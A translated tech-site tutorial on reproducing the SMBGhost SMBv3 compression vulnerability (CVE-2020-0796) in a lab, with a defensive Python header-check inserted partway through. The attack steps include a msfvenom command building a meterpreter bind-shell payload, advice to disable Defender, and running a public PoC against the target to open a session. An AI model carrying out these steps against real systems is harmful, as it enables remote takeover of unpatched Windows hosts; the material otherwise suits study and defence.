2025-01-17 Update From: SLTechnology News&Howtos (Network Security)
Shulou (Shulou.com) 05/31 Report
This article explains how to reproduce the CVE-2020-0796 vulnerability. The editor thinks it is very practical, so it is shared here for study. I hope you get something out of reading it.
I. Introduction to the vulnerability
The Microsoft Server Message Block (SMB) protocol is Microsoft's network file sharing protocol, used in Microsoft Windows. It is enabled by default on most Windows systems and is used to share files, printers and so on between computers. Windows 10 and Windows Server 2016 introduced SMB 3.1.1. This vulnerability exists because SMBv3 does not handle compressed packets correctly: when decompressing a packet it uses the length supplied by the client without checking that the length is valid, which leads to an integer overflow. By exploiting this vulnerability an attacker can remotely attack an SMB server and execute arbitrary malicious code, and can also set up a malicious SMB server to lure clients into connecting and attack clients on a large scale.
Scope of impact:
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)
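As an added example in the defender's direction (not code from the original article or from the PoC it refers to), the following Python check parses the SMB2 compression transform header, using the field layout from the MS-SMB2 specification, and flags a packet whose client-supplied lengths would wrap the 32-bit sum described above or exceed the data actually sent. The sample packets are constructed here for the check, not captured traffic.

```python
import struct

# SMB2 COMPRESSION_TRANSFORM_HEADER (MS-SMB2 2.2.42), 16 bytes, little-endian:
#   ProtocolId(4) OriginalCompressedSegmentSize(4) CompressionAlgorithm(2) Flags(2) Offset(4)
COMPRESSION_PROTOCOL_ID = b"\xfcSMB"
HEADER_FMT = "<4sIHHI"
HEADER_LEN = struct.calcsize(HEADER_FMT)  # 16
MAX_U32 = 0xFFFFFFFF
ALGORITHMS = {0x0000: "NONE", 0x0001: "LZNT1", 0x0002: "LZ77",
              0x0003: "LZ77+Huffman", 0x0004: "Pattern_V1"}


def inspect_compressed_smb2(data: bytes) -> dict:
    """Parse one compressed SMB2 message and report whether the
    client-supplied lengths are consistent. Returns a dict with a 'verdict'."""
    if len(data) < HEADER_LEN or data[:4] != COMPRESSION_PROTOCOL_ID:
        return {"verdict": "not-compressed-smb2"}
    _, orig_size, algo, flags, offset = struct.unpack(HEADER_FMT, data[:HEADER_LEN])
    payload_len = len(data) - HEADER_LEN
    findings = []
    # The unpatched server added these two fields in a 32-bit accumulator
    # and used the wrapped result for its allocation size.
    if orig_size + offset > MAX_U32:
        findings.append("OriginalCompressedSegmentSize + Offset wraps 32 bits")
    # Offset is the length of the uncompressed prefix that follows the header;
    # it cannot be larger than the bytes actually present on the wire.
    if offset > payload_len:
        findings.append("Offset exceeds remaining payload")
    if algo not in ALGORITHMS:
        findings.append(f"unknown CompressionAlgorithm 0x{algo:04x}")
    return {
        "verdict": "suspicious" if findings else "ok",
        "original_size": orig_size,
        "algorithm": ALGORITHMS.get(algo, "unknown"),
        "flags": flags,
        "offset": offset,
        "payload_len": payload_len,
        "findings": findings,
    }


def build_header(orig_size: int, algo: int, flags: int, offset: int) -> bytes:
    """Helper to construct sample headers for testing the check."""
    return struct.pack(HEADER_FMT, COMPRESSION_PROTOCOL_ID, orig_size, algo, flags, offset)


# Constructed samples: a plausible LZNT1 message and one whose lengths wrap.
BENIGN = build_header(0x100, 0x0001, 0, 0) + b"\x00" * 64
OVERFLOWING = build_header(0xFFFFFFFF, 0x0001, 0, 0x10) + b"\x00" * 64
```

Fed packets from a capture instead of the constructed samples, the "suspicious" verdict is the condition a network detection rule for this vulnerability looks for.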
II. Preparing the environment for reproducing the vulnerability:
Kali system ip: 172.16.0.27
Target machine: a Windows 10 system affected by this vulnerability, ip: 172.16.0.29, with python 3.6.x installed. The Windows 10 image I used (copy the link below to download): ed2k:// | file | cn_windows_10_business_editions_version_1903_updated_sept_2019_x64_dvd_2f5281e1.iso | 5231140864 | B1D5C 4C print 401036B0B1EBA64476A95F338 | / (remove the watermark)
Ps: turn off the Defender firewall.
Reproduction steps:
1. Check the Windows version of the environment: press Win+R and enter the command in the pop-up window to view the version information.
2. Use the detection tool to check whether the target machine has the vulnerability. The tool can be downloaded from https://github.com/ollypwn/SMBGhost; the result of running it, shown below, proves that the target machine has this vulnerability.
3. On Kali, use msf to generate the payload and confirm that the file named exploit was generated successfully: msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python > exploit
4. Download the PoC, paste the code generated in the previous step into exploit.py in place of the USER_PAYLOAD value, and rename the variable buf to USER_PAYLOAD.
5. Run the PoC: python3.6 exploit.py -ip xx.xx.xx.xx (if the error "physical read primitive failed!" appears, run it a few more times).
6. Start msf and set up the handler for the generated payload to obtain a session on the target machine; the attack has then succeeded (if the run fails, run it again a few times).
The above is how to reproduce the CVE-2020-0796 vulnerability. The editor believes it contains some knowledge points that we may encounter or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.